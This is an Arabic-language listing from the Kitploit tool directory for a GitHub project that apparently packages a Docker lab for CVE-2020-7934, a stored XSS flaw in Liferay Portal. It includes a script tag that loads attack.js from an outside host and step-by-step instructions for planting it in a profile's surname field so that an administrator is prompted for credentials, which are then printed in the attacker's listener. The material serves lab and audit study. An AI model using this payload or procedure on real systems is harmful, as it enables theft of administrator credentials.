Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
audit-xss-cve-2020-7934 — استغلال XSS قائم على Docker لـ CVE-2020-7934 يستهدف بوابة Liferay. يوضح تخزين النصوص البرمجية عبر المواقع من خلال حقول ملف تعريف المستخدم لسرقة بيانات اعتماد المسؤول. | Kitploit
أدوات/GitHubGitHub/giardinas-dev/audit-xss-cve-2020-7934
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHubgiardinas-dev/audit-xss-cve-2020-7934

audit-xss-cve-2020-7934

استغلال XSS قائم على Docker لـ CVE-2020-7934 يستهدف بوابة Liferay. يوضح تخزين النصوص البرمجية عبر المواقع من خلال حقول ملف تعريف المستخدم لسرقة بيانات اعتماد المسؤول.

عرض المستودع
45منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE 2020-7934

كيفية تشغيل CVE

المتطلبات

  1. docker

ملاحظات

من الممكن وضع سكريبت الهجوم على الإنترنت (مع كود js) http://yourjavascript.com/ سكريبت Js الخاص بنا على الإنترنت للهجوم html <script src="http://yourjavascript.com/920172199111/attack.js"></script>

أوامر التهيئة

  1. انتقل إلى المجلد الجذر لهذا المشروع
  2. شغل "sudo docker-compose up --build"
  3. طرفية جديدة: شغل "docker inspect liferay" ==> وانسخ قيمة IPAddress
  4. طرفية جديدة: شغل "python api_attacker.py"
  5. افتح متصفحًا واذهب إلى "http://IPAddress:8080" ==> يجب أن تحصل على بوابة liferay كاستجابة
  6. لإيقاف وحذف الحاويات استخدم "sudo docker-compose rm"

تعليمات الهجوم

  1. سجل في liferay كمستخدم، وسجل الدخول، وفي قسم "المواقع المتاحة"، انضم إلى موقع "liferay".
  2. غيّر "اسم العائلة" في سكريبت JS (مباشرة () أو من خلال "src =" http ... "")
  • سجل الدخول كمسؤول liferay (اسم المستخدم: [email protected]، كلمة المرور: test)
  • اذهب إلى المواقع المتاحة وانقر على "liferay"، ستفتح الصفحة العامة لهذا الموقع.
  • اذهب إلى الصفحة الجديدة، ستظهر قائمة على اليمين، انقر على "العضوية".
  • حدد المستخدم المسجل في الخطوة 1. في تلك اللحظة سيتم تنفيذ السكريبت. 5.1) في سكريبت attack.js ستطلب الصفحة بيانات الاعتماد.
  • في طرفية الخطوة 5 (من أوامر التهيئة) سيتم طباعة اسم المستخدم/كلمة المرور التي تم إدخالها في 5.1 (من قبل المسؤول) )
  • تنزيل الأداة